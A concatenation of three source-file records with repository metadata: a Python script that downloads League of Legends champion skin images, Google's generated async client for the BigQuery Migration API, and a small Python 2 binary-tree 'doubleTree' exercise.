3822499a63ebcc84c6edbbd60ae303ba8dc6afd7 | 7a27414a9ddc208f07ba7a949b13a4af172741d0 | /代码管理/英雄联盟全皮肤爬取/LOLSkin_Spider.py | 3132a031654700d52b453ec5fff04c231096f95e | [] | no_license | 01xu10/myproject | 28cc51e0801df1f8f90704a5871f5bca05ce7609 | 0346bb952823f3cd4c8c383115f2a617f39f7cce | refs/heads/main | 2023-06-27T05:14:00.781065 | 2021-08-05T07:13:53 | 2021-08-05T07:13:53 | 384,674,992 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,265 | py | # !/usr/bin/env python
# -*- coding: utf-8 -*-
import requests, jsonpath, os
from pprint import pprint
def main():
start_url = r'https://game.gtimg.cn/images/lol/act/img/js/heroList/hero_list.js'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/87.0.4280.66 Safari/537.36'
}
# 2、第一次请求,获取hero_id
response = requests.get(start_url, headers=headers).json()
pprint(response)
hero_ids = jsonpath.jsonpath(response, '$..heroId')
# pprint(hero_ids)p
hero_names = jsonpath.jsonpath(response, '$..name')
# pprint(hero_name)
# 3、构造hero_info页面 hero_info里面是没有炫彩皮肤的
for hero_id, hero_name in zip(hero_ids, hero_names):
hero_info_url = r'https://game.gtimg.cn/images/lol/act/img/js/hero/{}.js'.format(hero_id)
# 4、请求得到hero_img_info
hero_img_info = requests.get(hero_info_url, headers=headers).json()
# pprint(hero_img_info)
# 5、解析得到hero_skin_names, hero_skin_urls
hero_skin_names = jsonpath.jsonpath(hero_img_info, '$..name')[2::]
# pprint(hero_skin_names)
hero_skin_urls = jsonpath.jsonpath(hero_img_info, '$..mainImg')[1::]
# pprint(hero_skin_urls)
# 6、遍历循环得到hero_skin_name, hero_skin_url
for hero_skin_name, hero_skin_url in zip(hero_skin_names, hero_skin_urls):
# pprint(hero_skin_url)
# 7、对图片发请请求,得到二进制数据 img_content
try:
img_content = requests.get(hero_skin_url, headers=headers).content
# pprint(img_content)
except Exception as e:
continue
# 8、创建文件夹
os.makedirs(r'./{}'.format(hero_name), exist_ok=True)
# 9、保存数据
try:
with open(r'./{}/{}.jpg'.format(hero_name, hero_skin_name), 'wb') as f:
f.write(img_content)
print('**图片正在下载:{}/{}.jpg'.format(hero_name, hero_skin_name))
except Exception as e:
continue
if __name__ == '__main__':
main()
| [
"1150772265@qq.com"
] | 1150772265@qq.com |
52d23763ebfe518aeb958a0508b12fbec7a415c5 | 5da5473ff3026165a47f98744bac82903cf008e0 | /packages/google-cloud-bigquery-migration/google/cloud/bigquery_migration_v2/services/migration_service/async_client.py | d9ad8c3c5049dc7577a051be8d97608cd3ec7f4d | [
"Apache-2.0"
] | permissive | googleapis/google-cloud-python | ed61a5f03a476ab6053870f4da7bc5534e25558b | 93c4e63408c65129422f65217325f4e7d41f7edf | refs/heads/main | 2023-09-04T09:09:07.852632 | 2023-08-31T22:49:26 | 2023-08-31T22:49:26 | 16,316,451 | 2,792 | 917 | Apache-2.0 | 2023-09-14T21:45:18 | 2014-01-28T15:51:47 | Python | UTF-8 | Python | false | false | 41,641 | py | # -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import (
Dict,
Mapping,
MutableMapping,
MutableSequence,
Optional,
Sequence,
Tuple,
Type,
Union,
)
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.api_core.client_options import ClientOptions
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.bigquery_migration_v2 import gapic_version as package_version
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from google.rpc import error_details_pb2 # type: ignore
from google.cloud.bigquery_migration_v2.services.migration_service import pagers
from google.cloud.bigquery_migration_v2.types import (
migration_entities,
migration_error_details,
migration_metrics,
migration_service,
)
from .client import MigrationServiceClient
from .transports.base import DEFAULT_CLIENT_INFO, MigrationServiceTransport
from .transports.grpc_asyncio import MigrationServiceGrpcAsyncIOTransport
class MigrationServiceAsyncClient:
"""Service to handle EDW migrations."""
_client: MigrationServiceClient
DEFAULT_ENDPOINT = MigrationServiceClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = MigrationServiceClient.DEFAULT_MTLS_ENDPOINT
migration_subtask_path = staticmethod(MigrationServiceClient.migration_subtask_path)
parse_migration_subtask_path = staticmethod(
MigrationServiceClient.parse_migration_subtask_path
)
migration_workflow_path = staticmethod(
MigrationServiceClient.migration_workflow_path
)
parse_migration_workflow_path = staticmethod(
MigrationServiceClient.parse_migration_workflow_path
)
common_billing_account_path = staticmethod(
MigrationServiceClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
MigrationServiceClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(MigrationServiceClient.common_folder_path)
parse_common_folder_path = staticmethod(
MigrationServiceClient.parse_common_folder_path
)
common_organization_path = staticmethod(
MigrationServiceClient.common_organization_path
)
parse_common_organization_path = staticmethod(
MigrationServiceClient.parse_common_organization_path
)
common_project_path = staticmethod(MigrationServiceClient.common_project_path)
parse_common_project_path = staticmethod(
MigrationServiceClient.parse_common_project_path
)
common_location_path = staticmethod(MigrationServiceClient.common_location_path)
parse_common_location_path = staticmethod(
MigrationServiceClient.parse_common_location_path
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
MigrationServiceAsyncClient: The constructed client.
"""
return MigrationServiceClient.from_service_account_info.__func__(MigrationServiceAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
MigrationServiceAsyncClient: The constructed client.
"""
return MigrationServiceClient.from_service_account_file.__func__(MigrationServiceAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` if provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variable is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
return MigrationServiceClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore
@property
def transport(self) -> MigrationServiceTransport:
"""Returns the transport used by the client instance.
Returns:
MigrationServiceTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(MigrationServiceClient).get_transport_class, type(MigrationServiceClient)
)
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, MigrationServiceTransport] = "grpc_asyncio",
client_options: Optional[ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the migration service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.MigrationServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = MigrationServiceClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def create_migration_workflow(
self,
request: Optional[
Union[migration_service.CreateMigrationWorkflowRequest, dict]
] = None,
*,
parent: Optional[str] = None,
migration_workflow: Optional[migration_entities.MigrationWorkflow] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> migration_entities.MigrationWorkflow:
r"""Creates a migration workflow.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_create_migration_workflow():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.CreateMigrationWorkflowRequest(
parent="parent_value",
)
# Make the request
response = await client.create_migration_workflow(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.CreateMigrationWorkflowRequest, dict]]):
The request object. Request to create a migration
workflow resource.
parent (:class:`str`):
Required. The name of the project to which this
migration workflow belongs. Example:
``projects/foo/locations/bar``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
migration_workflow (:class:`google.cloud.bigquery_migration_v2.types.MigrationWorkflow`):
Required. The migration workflow to
create.
This corresponds to the ``migration_workflow`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_migration_v2.types.MigrationWorkflow:
A migration workflow which specifies
what needs to be done for an EDW
migration.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, migration_workflow])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.CreateMigrationWorkflowRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if migration_workflow is not None:
request.migration_workflow = migration_workflow
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_migration_workflow,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def get_migration_workflow(
self,
request: Optional[
Union[migration_service.GetMigrationWorkflowRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> migration_entities.MigrationWorkflow:
r"""Gets a previously created migration workflow.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_get_migration_workflow():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.GetMigrationWorkflowRequest(
name="name_value",
)
# Make the request
response = await client.get_migration_workflow(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.GetMigrationWorkflowRequest, dict]]):
The request object. A request to get a previously created
migration workflow.
name (:class:`str`):
Required. The unique identifier for the migration
workflow. Example:
``projects/123/locations/us/workflows/1234``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_migration_v2.types.MigrationWorkflow:
A migration workflow which specifies
what needs to be done for an EDW
migration.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.GetMigrationWorkflowRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_migration_workflow,
default_retry=retries.Retry(
initial=1.0,
maximum=10.0,
multiplier=1.3,
predicate=retries.if_exception_type(
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_migration_workflows(
self,
request: Optional[
Union[migration_service.ListMigrationWorkflowsRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListMigrationWorkflowsAsyncPager:
r"""Lists previously created migration workflow.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_list_migration_workflows():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.ListMigrationWorkflowsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_migration_workflows(request=request)
# Handle the response
async for response in page_result:
print(response)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.ListMigrationWorkflowsRequest, dict]]):
The request object. A request to list previously created
migration workflows.
parent (:class:`str`):
Required. The project and location of the migration
workflows to list. Example:
``projects/123/locations/us``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_migration_v2.services.migration_service.pagers.ListMigrationWorkflowsAsyncPager:
Response object for a ListMigrationWorkflows call.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.ListMigrationWorkflowsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_migration_workflows,
default_retry=retries.Retry(
initial=1.0,
maximum=10.0,
multiplier=1.3,
predicate=retries.if_exception_type(
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListMigrationWorkflowsAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def delete_migration_workflow(
self,
request: Optional[
Union[migration_service.DeleteMigrationWorkflowRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes a migration workflow by name.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_delete_migration_workflow():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.DeleteMigrationWorkflowRequest(
name="name_value",
)
# Make the request
await client.delete_migration_workflow(request=request)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.DeleteMigrationWorkflowRequest, dict]]):
The request object. A request to delete a previously
created migration workflow.
name (:class:`str`):
Required. The unique identifier for the migration
workflow. Example:
``projects/123/locations/us/workflows/1234``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.DeleteMigrationWorkflowRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_migration_workflow,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
async def start_migration_workflow(
self,
request: Optional[
Union[migration_service.StartMigrationWorkflowRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Starts a previously created migration workflow. I.e.,
the state transitions from DRAFT to RUNNING. This is a
no-op if the state is already RUNNING. An error will be
signaled if the state is anything other than DRAFT or
RUNNING.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_start_migration_workflow():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.StartMigrationWorkflowRequest(
name="name_value",
)
# Make the request
await client.start_migration_workflow(request=request)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.StartMigrationWorkflowRequest, dict]]):
The request object. A request to start a previously
created migration workflow.
name (:class:`str`):
Required. The unique identifier for the migration
workflow. Example:
``projects/123/locations/us/workflows/1234``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.StartMigrationWorkflowRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.start_migration_workflow,
default_retry=retries.Retry(
initial=1.0,
maximum=10.0,
multiplier=1.3,
predicate=retries.if_exception_type(
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
async def get_migration_subtask(
self,
request: Optional[
Union[migration_service.GetMigrationSubtaskRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> migration_entities.MigrationSubtask:
r"""Gets a previously created migration subtask.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_get_migration_subtask():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.GetMigrationSubtaskRequest(
name="name_value",
)
# Make the request
response = await client.get_migration_subtask(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.GetMigrationSubtaskRequest, dict]]):
The request object. A request to get a previously created
migration subtasks.
name (:class:`str`):
Required. The unique identifier for the migration
subtask. Example:
``projects/123/locations/us/workflows/1234/subtasks/543``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_migration_v2.types.MigrationSubtask:
A subtask for a migration which
carries details about the configuration
of the subtask. The content of the
details should not matter to the end
user, but is a contract between the
subtask creator and subtask worker.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.GetMigrationSubtaskRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_migration_subtask,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_migration_subtasks(
self,
request: Optional[
Union[migration_service.ListMigrationSubtasksRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListMigrationSubtasksAsyncPager:
r"""Lists previously created migration subtasks.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import bigquery_migration_v2
async def sample_list_migration_subtasks():
# Create a client
client = bigquery_migration_v2.MigrationServiceAsyncClient()
# Initialize request argument(s)
request = bigquery_migration_v2.ListMigrationSubtasksRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_migration_subtasks(request=request)
# Handle the response
async for response in page_result:
print(response)
Args:
request (Optional[Union[google.cloud.bigquery_migration_v2.types.ListMigrationSubtasksRequest, dict]]):
The request object. A request to list previously created
migration subtasks.
parent (:class:`str`):
Required. The migration task of the subtasks to list.
Example: ``projects/123/locations/us/workflows/1234``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_migration_v2.services.migration_service.pagers.ListMigrationSubtasksAsyncPager:
Response object for a ListMigrationSubtasks call.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = migration_service.ListMigrationSubtasksRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_migration_subtasks,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListMigrationSubtasksAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def __aenter__(self) -> "MigrationServiceAsyncClient":
return self
async def __aexit__(self, exc_type, exc, tb):
await self.transport.close()
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=package_version.__version__
)
__all__ = ("MigrationServiceAsyncClient",)
| [
"noreply@github.com"
] | googleapis.noreply@github.com |
c7573c8fd33eebb4c2a6f73f64ce8b8f96b3a533 | 80d02d14744e759d34646e18565f40753685eab7 | /10.doubleTree.py | 05f2c85736220c2dcfc2cc6201b49a8e0f63192d | [] | no_license | ArunRamachandran/BinaryTree-Python | b247e0abc8a8d97d20b3cfa08652dd760607db97 | ef76f3cd43e48250db21cbd6a4d805a848221ccb | refs/heads/master | 2021-01-25T08:42:53.933600 | 2015-01-11T12:06:17 | 2015-01-11T12:06:17 | 29,001,483 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 914 | py | """ Python code to implement a doubleTree fn """
class Node :
"""Node of a Tree"""
def __init__(self) :
self.data = None
self.left = None
self.right= None
def Build(head) :
head.data = 2
x = [1,3]
new_left = Node()
new_left.data = 1
head.left = new_left
new_right = Node()
new_right.data = 3
head.right = new_right
return head
def printTree(head) :
if head == None:
return
else :
print "Data : %d" % (head.data)
printTree(head.left)
printTree(head.right)
def NewNode(obj) :
new = Node()
new.data = obj
new.left = None
new.right= None
return new
def doubleTree(head) :
if head == None:
return
else :
temp = Node()
doubleTree(head.left)
doubleTree(head.right)
temp = head.left
head.left = NewNode(head.data)
head.left.left = temp
head = Node()
head = Build(head)
print "Present Tree "
printTree(head)
doubleTree(head)
print "After doubling "
printTree(head)
| [
"arunkramachandran92@gmail.com"
] | arunkramachandran92@gmail.com |
